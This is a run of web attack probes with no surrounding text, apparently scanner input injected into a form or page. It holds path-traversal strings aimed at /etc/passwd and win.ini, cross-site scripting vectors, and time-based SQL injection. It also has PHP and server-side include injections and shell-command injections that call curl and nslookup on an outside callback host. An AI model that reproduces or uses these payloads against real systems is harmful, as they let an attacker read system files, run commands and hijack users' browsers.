1<iframe src='data:text/html;base64 1<anx60xO x=9847> ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg /\../\../\../\../\../\../\../etc/passwd ../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg c:/windows/win.ini '&&sleep(27*1000)*godrks&&' xfs.bxss.me 1%22onmouseover=g2PO(90642)%22 PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9296'> 1<img sRc='http://attacker-9380/log.php? /../..//../..//../..//../..//../..//etc/passwd%00.jpg <esi:include src="http://bxss.me/rpb.png"/> &n925787=v944465 if(now()=sysdate() -1); waitfor delay '0:0:15' -- ';print(md5(31337));$a=' 1'"()&%<zzz><ScRiPt >g2PO(9923)</ScRiPt> 1"onmouseover=g2PO(92412)" 1<body onload=g2PO(9982)> 1<ablxfRB< .\\./.\\./.\\./.\\./.\\./.\\./etc/passwd &(nslookup -q=cname hitaiulkwpbvx1f47b.bxss.me||curl hitaiulkwpbvx1f47b.bxss.me)&'\"`0&(nslookup -q=cname hitaiulkwpbvx1f47b.bxss.me||curl hitaiulkwpbvx1f47b.bxss.me)&`' WEB-INF/web.xml sleep(15) bxss.me 1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99) '"()&%<zzz><ScRiPt >g2PO(9523)</ScRiPt> 1" zSro=g2PO([!+!]) 1Hk="
